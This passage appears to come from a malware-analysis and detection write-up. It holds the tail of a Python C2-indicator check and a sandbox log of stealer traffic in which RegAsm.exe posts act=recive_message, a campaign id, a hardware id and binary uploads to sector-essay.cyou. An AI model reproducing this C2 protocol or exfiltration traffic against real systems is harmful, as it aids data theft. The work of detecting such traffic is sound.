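    hits = lumma_c2_indicators(raw_request, process)
    return "POST /api" in hits and any(h.startswith("act=") for h in hits)
```

Run against the captured pair, the life request scores on the path and the act field alone, and the recive_message request adds ver=4.0 and the lid campaign id; the reassembled life reply is exactly ok, while the recive_message reply cannot be reassembled from the report because only part of its 9,610-byte chunk is printed, which is the case a decoder must refuse rather than silently return a partial buffer.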


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49706 | 104.21.47.136 | 443 | 6392 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 07:35:40 UTC | 265 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 52
Host: sector-essay.cyou
2024-11-24 07:35:40 UTC | 52 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37 31 37 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--6928154717&j=
2024-11-24 07:35:41 UTC | 1019 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 07:35:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=130kq5jlpbgsh1b3aag3dq53k6; expires=Thu, 20-Mar-2025 01:22:20 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V8WTTw%2BLVgTUOH5N5GVFK4vmQusryTI%2FSk%2B0wqr7V55gw7ugNuqS27dYpPMAk4OMpr8aein1ggW2SS%2FqlmdkHjxBeniBAnVBlGoO8F5TEHGGU5lpyurnFeqs%2BU5m99iT7foPYA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e77b9416f4ac3ee-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1483&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=953&delivery_rate=1923583&cwnd=246&unsent_bytes=0&cid=34c1544a90916fb0&ts=715&x=0"
2024-11-24 07:35:41 UTC | 350 | IN | Data Raw: 32 35 38 61 0d 0a 47 43 64 2f 78 35 6a 4d 66 43 35 33 57 58 55 5a 58 74 69 75 50 43 63 45 78 7a 48 45 36 4f 7a 6c 70 73 76 63 2b 79 39 35 31 56 52 6a 42 51 6e 6c 6f 76 68 51 44 41 51 38 56 79 4d 71 71 74 74 5a 43 79 61 6d 56 65 62 53 69 6f 54 4b 75 4c 6e 58 44 51 2b 34 64 69 4a 42 48 71 76 72 71 56 41 4d 45 69 46 58 49 77 57 6a 6a 46 6c 4a 4a 76 30 54 6f 59 4b 4f 68 4d 71 70 76 5a 42 41 43 62 6b 33 63 45 73 59 72 2f 32 76 47 45 38 62 4e 42 42 38 4f 37 6e 45 55 6b 35 70 72 31 7a 6d 78 4d 36 41 33 4f 6e 6d 32 57 49 63 6f 54 56 56 52 67 79 73 75 72 46 51 56 56 55 38 47 7a 74 6b 2b 73 39 5a 52 57 69 68 56 61 2b 41 68 49 33 43 71 4c 69 52 58 78 43 7a 50 48 42 46 47 36 37 33 70 67 78 43 45 54 4d 62 65 6a 47 35 6a 42 41 46 59 62 30 54 2f 73 72 64 74 63 65 34 72
Data Ascii: 258aGCd/x5jMfC53WXUZXtiuPCcExzHE6Ozlpsvc+y951VRjBQnlovhQDAQ8VyMqqttZCyamVebSioTKuLnXDQ+4diJBHqvrqVAMEiFXIwWjjFlJJv0ToYKOhMqpvZBACbk3cEsYr/2vGE8bNBB8O7nEUk5pr1zmxM6A3Onm2WIcoTVVRgysurFQVVU8Gztk+s9ZRWihVa+AhI3CqLiRXxCzPHBFG673pgxCETMbejG5jBAFYb0T/srdtce4r
2024-11-24 07:35:41 UTC | 1369 | IN | Data Raw: 47 36 76 37 6f 78 35 65 48 54 41 63 66 69 36 78 78 56 4e 49 5a 71 68 5a 71 59 6d 4f 67 4d 36 6a 73 5a 4e 4a 46 72 6f 77 65 6b 56 64 36 37 71 70 42 67 78 4e 65 7a 52 2b 4c 4c 33 41 53 41 64 63 35 55 7a 6f 6b 38 36 41 79 4f 6e 6d 32 55 55 65 74 44 56 78 53 68 36 74 38 62 77 65 58 68 4d 32 45 6d 6b 36 76 38 4a 55 52 6e 53 76 58 61 43 4a 68 34 7a 4e 72 4c 6d 64 44 56 58 33 4d 57 49 46 52 65 58 62 6f 78 56 41 48 79 77 58 4f 79 50 30 31 52 35 43 61 75 55 4c 35 6f 36 50 67 38 57 74 73 4a 64 4a 46 37 45 34 64 30 6f 62 72 2f 71 70 46 45 51 64 4f 68 70 77 4d 37 72 4a 55 30 46 67 71 56 4b 6a 79 73 44 48 77 37 48 2b 77 51 30 31 73 44 56 6f 42 79 69 6d 39 4b 41 5a 57 6c 55 6b 57 57 4a 38 76 63 41 65 48 53 61 72 56 71 6d 59 6a 35 58 42 70 36 79 56 53 42 32 36 4e 58 52
Data Ascii: G6v7ox5eHTAcfi6xxVNIZqhZqYmOgM6jsZNJFrowekVd67qpBgxNezR+LL3ASAdc5Uzok86AyOnm2UUetDVxSh6t8bweXhM2Emk6v8JURnSvXaCJh4zNrLmdDVX3MWIFReXboxVAHywXOyP01R5CauUL5o6Pg8WtsJdJF7E4d0obr/qpFEQdOhpwM7rJU0FgqVKjysDHw7H+wQ01sDVoByim9KAZWlUkWWJ8vcAeHSarVqmYj5XBp6yVSB26NXR
2024-11-24 07:35:41 UTC | 1369 | IN | Data Raw: 4b 41 5a 57 6c 55 6b 57 57 4a 38 76 63 41 65 48 53 61 70 57 71 61 42 68 49 50 45 72 72 4f 63 54 68 79 30 4f 33 31 50 45 36 4c 2b 6f 68 64 42 45 7a 73 51 66 7a 6d 6f 79 56 64 4a 61 75 55 64 35 6f 32 57 78 35 7a 70 6b 5a 35 62 47 4a 67 31 61 30 78 64 75 72 53 33 58 6b 73 5a 65 30 38 37 4f 37 2f 45 56 55 4e 75 70 55 47 6a 68 49 57 47 7a 71 2b 2f 6c 45 45 64 74 7a 64 36 51 78 47 6c 2f 61 6b 4d 58 68 41 39 42 58 46 38 39 49 78 5a 58 53 62 39 45 35 43 61 6d 5a 62 53 36 34 75 61 51 78 57 77 49 44 70 61 55 37 79 36 71 52 49 4d 54 58 73 63 65 7a 43 39 78 46 68 42 62 71 70 63 72 35 69 50 69 38 71 37 75 5a 6c 45 46 62 67 36 63 30 67 61 71 50 47 6b 45 30 67 53 4f 6c 63 31 66 4c 33 55 48 68 30 6d 6b 30 4f 72 68 71 43 4d 79 4b 44 2b 68 67 4d 43 39 7a 46 32 42 55 58 6c
Data Ascii: KAZWlUkWWJ8vcAeHSapWqaBhIPErrOcThy0O31PE6L+ohdBEzsQfzmoyVdJauUd5o2Wx5zpkZ5bGJg1a0xdurS3XksZe087O7/EVUNupUGjhIWGzq+/lEEdtzd6QxGl/akMXhA9BXF89IxZXSb9E5CamZbS64uaQxWwIDpaU7y6qRIMTXscezC9xFhBbqpcr5iPi8q7uZlEFbg6c0gaqPGkE0gSOlc1fL3UHh0mk0OrhqCMyKD+hgMC9zF2BUXl
2024-11-24 07:35:41 UTC | 1369 | IN | Data Raw: 4d 55 50 78 4a 2b 4f 4c 33 49 57 45 6f 6d 36 78 4f 68 6b 73 37 66 68 49 61 5a 72 41 38 36 6a 58 5a 6c 43 77 54 6c 2f 61 4a 65 46 46 55 33 46 48 63 30 74 63 70 58 53 57 79 73 57 4b 71 42 69 6f 76 4e 72 4c 69 59 53 42 36 32 4d 6e 5a 50 47 36 62 35 6f 52 46 44 48 58 74 5a 4f 7a 75 69 6a 41 59 46 51 37 4a 59 71 49 7a 4f 6d 49 71 77 2f 70 35 42 57 2b 39 32 64 6b 77 62 6f 2f 2b 69 48 30 6f 64 50 68 39 2f 50 62 7a 4b 58 55 70 69 6f 46 4b 70 6a 6f 4b 4a 7a 71 69 2f 6c 55 59 55 76 44 4d 36 43 31 32 69 34 75 35 47 44 43 51 34 41 57 77 73 74 6f 78 42 43 33 2f 6c 56 4b 72 4b 31 73 66 46 75 37 53 54 51 78 36 34 4d 33 6c 4b 47 71 6a 38 6f 68 52 46 48 54 30 59 63 69 36 35 77 46 42 43 61 4b 6c 64 71 34 43 4e 69 6f 54 6e 2f 70 35 56 57 2b 39 32 56 6b 49 51 69 2f 47 69 47
Data Ascii: MUPxJ+OL3IWEom6xOhks7fhIaZrA86jXZlCwTl/aJeFFU3FHc0tcpXSWysWKqBiovNrLiYSB62MnZPG6b5oRFDHXtZOzuijAYFQ7JYqIzOmIqw/p5BW+92dkwbo/+iH0odPh9/PbzKXUpioFKpjoKJzqi/lUYUvDM6C12i4u5GDCQ4AWwstoxBC3/lVKrK1sfFu7STQx64M3lKGqj8ohRFHT0Yci65wFBCaKldq4CNioTn/p5VW+92VkIQi/GiG
2024-11-24 07:35:41 UTC | 1369 | IN | Data Raw: 46 4f 33 4c 36 79 30 59 46 50 75 56 6c 6f 5a 71 65 68 49 61 59 71 4a 70 62 45 4c 6f 36 4f 6c 70 54 76 4c 71 70 45 67 78 4e 65 78 46 30 4e 62 6e 44 58 30 78 71 71 46 61 76 6a 34 2b 42 77 4b 4f 30 6d 55 73 64 74 6a 4e 77 52 68 79 76 38 36 6b 57 53 78 59 70 56 7a 56 38 76 64 51 65 48 53 61 4d 56 4c 53 45 6e 73 66 62 35 36 66 5a 53 68 66 33 62 6a 70 42 46 36 72 2b 71 52 4a 4b 45 44 30 61 65 6a 4f 37 7a 46 46 42 62 61 78 56 70 34 65 4c 69 73 43 37 74 4a 4a 43 46 37 34 36 64 77 56 54 35 66 32 32 58 68 52 56 43 68 70 31 4d 72 33 61 48 6c 6f 6f 76 42 4f 68 68 73 37 66 68 4b 69 79 6c 6b 34 55 74 44 56 37 54 77 2b 33 39 71 63 57 53 52 6b 77 47 58 30 75 76 4d 4e 58 52 6d 57 73 56 4b 36 47 68 49 54 44 36 66 44 5a 53 67 50 33 62 6a 70 6d 43 72 58 33 37 67 45 43 44 48
Data Ascii: FO3L6y0YFPuVloZqehIaYqJpbELo6OlpTvLqpEgxNexF0NbnDX0xqqFavj4+BwKO0mUsdtjNwRhyv86kWSxYpVzV8vdQeHSaMVLSEnsfb56fZShf3bjpBF6r+qRJKED0aejO7zFFBbaxVp4eLisC7tJJCF746dwVT5f22XhRVChp1Mr3aHloovBOhhs7fhKiylk4UtDV7Tw+39qcWSRkwGX0uvMNXRmWsVK6GhITD6fDZSgP3bjpmCrX37gECDH
2024-11-24 07:35:41 UTC | 1369 | IN | Data Raw: 76 63 70 51 56 32 4f 6a 58 4b 6d 44 68 34 50 4d 71 72 36 64 53 52 79 79 4e 58 5a 4f 47 71 62 31 71 68 64 43 48 44 52 58 4e 58 79 39 31 42 34 64 4a 6f 52 49 70 59 61 44 78 39 76 6e 70 39 6c 4b 46 2f 64 75 4f 6b 6b 54 6f 50 71 6b 47 45 67 51 50 52 31 2b 50 4c 48 50 55 55 46 67 6f 56 79 6d 67 59 65 47 77 71 79 30 6b 6b 73 57 74 44 42 38 42 56 50 6c 2f 62 5a 65 46 46 55 62 44 48 59 77 76 59 78 42 43 33 2f 6c 56 4b 72 4b 31 73 66 50 70 62 71 65 54 52 61 30 50 6e 39 42 46 36 44 36 70 67 78 45 46 54 77 46 61 54 79 7a 79 56 4a 47 5a 71 46 56 72 34 79 4e 67 34 54 6e 2f 70 35 56 57 2b 39 32 56 30 6b 61 6a 50 32 31 58 6c 4e 62 49 6c 64 38 4d 50 71 55 48 6b 52 74 72 31 79 72 69 59 69 45 7a 36 79 30 6d 45 6f 54 75 69 52 35 53 68 4b 68 2b 71 45 59 53 68 51 30 45 58 77
Data Ascii: vcpQV2OjXKmDh4PMqr6dSRyyNXZOGqb1qhdCHDRXNXy91B4dJoRIpYaDx9vnp9lKF/duOkkToPqkGEgQPR1+PLHPUUFgoVymgYeGwqy0kksWtDB8BVPl/bZeFFUbDHYwvYxBC3/lVKrK1sfPpbqeTRa0Pn9BF6D6pgxEFTwFaTyzyVJGZqFVr4yNg4Tn/p5VW+92V0kajP21XlNbIld8MPqUHkRtr1yriYiEz6y0mEoTuiR5ShKh+qEYShQ0EXw
2024-11-24 07:35:41 UTC | 1369 | IN | Data Raw: 45 59 68 6d 32 32 42 6e 49 53 41 31 4b 36 70 6c 67 31 56 39 7a 6b 36 48 53 54 6c 38 36 6b 46 58 51 4d 32 42 33 78 38 68 59 49 65 58 53 62 39 45 35 4f 4a 67 49 6e 44 76 36 2f 55 61 67 32 39 4d 57 70 43 43 71 71 36 34 46 35 4b 56 57 4e 45 4e 58 79 2b 33 52 34 64 4e 76 63 49 38 39 6e 5a 31 35 61 32 38 49 41 4e 44 66 64 75 4b 41 74 64 74 37 72 32 58 67 73 57 4b 51 56 39 50 36 7a 50 47 58 74 59 67 6b 6d 72 6a 4a 6d 57 2b 70 65 35 67 30 41 64 6f 43 63 32 55 42 36 72 39 4b 6b 49 44 46 74 37 47 44 74 6b 67 34 77 57 42 56 6e 72 45 37 37 4b 31 73 66 78 71 72 43 58 53 67 32 6d 65 31 31 66 45 4b 50 74 76 31 34 43 56 54 31 58 49 32 7a 30 6a 46 70 55 4a 76 30 44 39 4e 48 62 31 4a 50 35 37 49 59 44 41 76 63 67 4f 68 31 50 36 37 71 38 58 68 52 56 66 42 52 70 4c 72 7a 50
Data Ascii: EYhm22BnISA1K6plg1V9zk6HSTl86kFXQM2B3x8hYIeXSb9E5OJgInDv6/Uag29MWpCCqq64F5KVWNENXy+3R4dNvcI89nZ15a28IANDfduKAtdt7r2XgsWKQV9P6zPGXtYgkmrjJmW+pe5g0AdoCc2UB6r9KkIDFt7GDtkg4wWBVnrE77K1sfxqrCXSg2me11fEKPtv14CVT1XI2z0jFpUJv0D9NHb1JP57IYDAvcgOh1P67q8XhRVfBRpLrzP
2024-11-24 07:35:41 UTC | 1054 | IN | Data Raw: 56 4c 35 74 4c 4f 73 73 65 6e 73 4a 35 62 43 76 6f 52 64 45 49 63 73 2b 71 35 45 51 78 62 65 78 45 37 5a 4f 69 43 48 6b 46 33 35 51 76 32 32 4e 58 53 6c 2f 37 75 79 31 4a 56 72 6e 5a 73 42 55 58 33 74 4f 34 4d 44 45 31 37 55 48 67 75 71 4d 70 64 55 32 58 69 62 5a 69 74 67 49 44 46 76 36 36 4f 51 6c 53 5a 41 46 74 37 49 37 44 35 6f 42 42 4c 41 79 70 58 4e 58 79 31 6a 41 5a 38 4a 75 30 54 6d 63 54 4f 6e 34 54 78 2f 71 78 4f 46 62 6b 78 62 46 52 51 67 76 53 70 48 31 6f 46 4c 42 67 30 45 6f 7a 74 48 67 73 6d 6f 78 50 2b 32 4d 44 48 77 4c 6a 2b 77 52 31 4a 37 47 4d 70 45 6b 33 33 35 65 41 48 44 41 4e 37 54 79 6c 79 2b 74 34 65 48 53 62 69 55 4c 53 59 69 49 54 53 71 76 6d 6e 63 7a 79 35 4d 58 74 54 44 61 6a 32 6a 78 31 64 48 77 55 70 62 6a 2b 30 77 6c 6c 54 64
                        Data Ascii: VL5tLOssensJ5bCvoRdEIcs+q5EQxbexE7ZOiCHkF35Qv22NXSl/7uy1JVrnZsBUX3tO4MDE17UHguqMpdU2XibZitgIDFv66OQlSZAFt7I7D5oBBLAypXNXy1jAZ8Ju0TmcTOn4Tx/qxOFbkxbFRQgvSpH1oFLBg0EoztHgsmoxP+2MDHwLj+wR1J7GMpEk335eAHDAN7Tyly+t4eHSbiULSYiITSqvmnczy5MXtTDaj2jx1dHwUpbj+0wllTd
                        2024-11-24 07:35:41 UTC1369INData Raw: 31 65 65 32 0d 0a 49 4d 65 77 45 37 5a 4f 6d 43 48 6c 63 6d 2f 52 50 68 68 49 4f 47 78 36 65 39 69 31 38 64 74 43 42 35 41 69 4f 62 33 36 4d 54 53 52 73 38 4b 55 55 64 73 4e 78 54 53 6d 48 6e 63 36 47 63 6a 62 6e 36 6e 71 2b 65 58 56 6d 52 4e 57 78 47 58 65 75 36 74 6c 34 55 56 52 6f 64 61 7a 47 31 79 78 78 6c 59 62 4e 51 35 73 54 4f 67 34 54 78 2f 72 78 41 46 72 49 34 66 51 63 38 72 2b 71 6a 45 55 74 58 47 78 42 74 50 2f 71 43 48 6b 6b 6d 2f 52 4f 6e 67 4a 36 4b 79 36 37 79 6e 6c 63 63 39 33 67 36 53 31 33 39 75 71 38 55 58 42 67 30 45 44 63 36 74 4d 49 65 57 69 69 38 45 37 44 4b 31 74 53 4b 36 61 7a 5a 46 56 76 77 4e 57 68 58 47 36 62 73 72 56 6c 79 4b 78 59 46 66 43 79 35 6a 6d 39 49 59 72 4e 47 70 5a 71 4a 75 66 71 45 72 4a 35 64 47 50 55 48 62 45 59
                        Data Ascii: 1ee2IMewE7ZOmCHlcm/RPhhIOGx6e9i18dtCB5AiOb36MTSRs8KUUdsNxTSmHnc6Gcjbn6nq+eXVmRNWxGXeu6tl4UVRodazG1yxxlYbNQ5sTOg4Tx/rxAFrI4fQc8r+qjEUtXGxBtP/qCHkkm/ROngJ6Ky67ynlcc93g6S139uq8UXBg0EDc6tMIeWii8E7DK1tSK6azZFVvwNWhXG6bsrVlyKxYFfCy5jm9IYrNGpZqJufqErJ5dGPUHbEY


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        2 | 192.168.2.5 | 49707 | 104.21.47.136 | 443 | 6392 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-11-24 07:35:42 UTC | 273 | OUT | POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=BF8HSG09
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 12780
                        Host: sector-essay.cyou
                        2024-11-24 07:35:42 UTC12780OUTData Raw: 2d 2d 42 46 38 48 53 47 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 36 39 37 45 44 37 42 33 41 37 35 38 37 31 37 46 45 45 38 31 35 45 42 34 30 33 46 35 44 35 34 0d 0a 2d 2d 42 46 38 48 53 47 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 42 46 38 48 53 47 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37 31 37 0d 0a 2d 2d 42 46 38 48 53 47 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                        Data Ascii: --BF8HSG09Content-Disposition: form-data; name="hwid"5697ED7B3A758717FEE815EB403F5D54--BF8HSG09Content-Disposition: form-data; name="pid"2--BF8HSG09Content-Disposition: form-data; name="lid"yau6Na--6928154717--BF8HSG09Content-Dis
                        2024-11-24 07:35:43 UTC | 1025 | IN | HTTP/1.1 200 OK
                        Date: Sun, 24 Nov 2024 07:35:43 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: PHPSESSID=6npuqheb793frp93jsch6tuhhk; expires=Thu, 20-Mar-2025 01:22:22 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nuKZfqspgGtDiiKBHc8Rg4a7G2SUipUuCCRvpJt%2FjGMp06hpYsqq2k2IorR%2Ffmq%2Bl1mCuSbbO5MahXfnq12A8mdO0JLKbzi5AtiGjQV6%2BARU%2By7RD4tfIuzM%2FefO3fwaJIjH8A%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8e77b94e6ad343c8-EWR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=1682&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2844&recv_bytes=13711&delivery_rate=1697674&cwnd=191&unsent_bytes=0&cid=c436299850488d7f&ts=780&x=0"
                        2024-11-24 07:35:43 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                        Data Ascii: eok 8.46.123.75
                        2024-11-24 07:35:43 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        3 | 192.168.2.5 | 49708 | 104.21.47.136 | 443 | 6392 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-11-24 07:35:44 UTC | 282 | OUT | POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=URWJUSLA0OTC7DX0W
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 15076
                        Host: sector-essay.cyou
                        2024-11-24 07:35:44 UTC15076OUTData Raw: 2d 2d 55 52 57 4a 55 53 4c 41 30 4f 54 43 37 44 58 30 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 36 39 37 45 44 37 42 33 41 37 35 38 37 31 37 46 45 45 38 31 35 45 42 34 30 33 46 35 44 35 34 0d 0a 2d 2d 55 52 57 4a 55 53 4c 41 30 4f 54 43 37 44 58 30 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 52 57 4a 55 53 4c 41 30 4f 54 43 37 44 58 30 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37
                        Data Ascii: --URWJUSLA0OTC7DX0WContent-Disposition: form-data; name="hwid"5697ED7B3A758717FEE815EB403F5D54--URWJUSLA0OTC7DX0WContent-Disposition: form-data; name="pid"2--URWJUSLA0OTC7DX0WContent-Disposition: form-data; name="lid"yau6Na--69281547
                        2024-11-24 07:35:45 UTC | 1023 | IN | HTTP/1.1 200 OK
                        Date: Sun, 24 Nov 2024 07:35:45 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: PHPSESSID=3entc8mfg1fvnfl2nsfn1jsptd; expires=Thu, 20-Mar-2025 01:22:24 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dsxi%2FvOALdXKL4xobg3laRvvz3wWpteHE15HLdrhIA6w4lu0JcPKDTJVj%2FONRuLDuik%2FO5TQOR2owsnTyDPXK8RafxkX39aplxFuEz7GjxRvyi%2BBtKl9MN3ORpiQdfB%2Fmn71wQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8e77b95aff9ede97-EWR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=1475&sent=12&recv=20&lost=0&retrans=0&sent_bytes=2844&recv_bytes=16016&delivery_rate=1849271&cwnd=216&unsent_bytes=0&cid=d1c3934039c2d0a4&ts=759&x=0"
                        2024-11-24 07:35:45 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                        Data Ascii: eok 8.46.123.75
                        2024-11-24 07:35:45 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        4 | 192.168.2.5 | 49709 | 104.21.47.136 | 443 | 6392 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-11-24 07:35:47 UTC | 281 | OUT | POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=IT1UG7M6MS1IK92F
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 20560
                        Host: sector-essay.cyou
                        2024-11-24 07:35:47 UTC15331OUTData Raw: 2d 2d 49 54 31 55 47 37 4d 36 4d 53 31 49 4b 39 32 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 36 39 37 45 44 37 42 33 41 37 35 38 37 31 37 46 45 45 38 31 35 45 42 34 30 33 46 35 44 35 34 0d 0a 2d 2d 49 54 31 55 47 37 4d 36 4d 53 31 49 4b 39 32 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 49 54 31 55 47 37 4d 36 4d 53 31 49 4b 39 32 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37 31 37 0d
                        Data Ascii: --IT1UG7M6MS1IK92FContent-Disposition: form-data; name="hwid"5697ED7B3A758717FEE815EB403F5D54--IT1UG7M6MS1IK92FContent-Disposition: form-data; name="pid"3--IT1UG7M6MS1IK92FContent-Disposition: form-data; name="lid"yau6Na--6928154717
                        2024-11-24 07:35:47 UTC5229OUTData Raw: 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14
                        Data Ascii: vMMZh'F3Wun 4F([:7s~X`nO`
                        2024-11-24 07:35:47 UTC | 1029 | IN | HTTP/1.1 200 OK
                        Date: Sun, 24 Nov 2024 07:35:47 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: PHPSESSID=lp8l4sk54h4ie7m10j9f24up38; expires=Thu, 20-Mar-2025 01:22:26 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
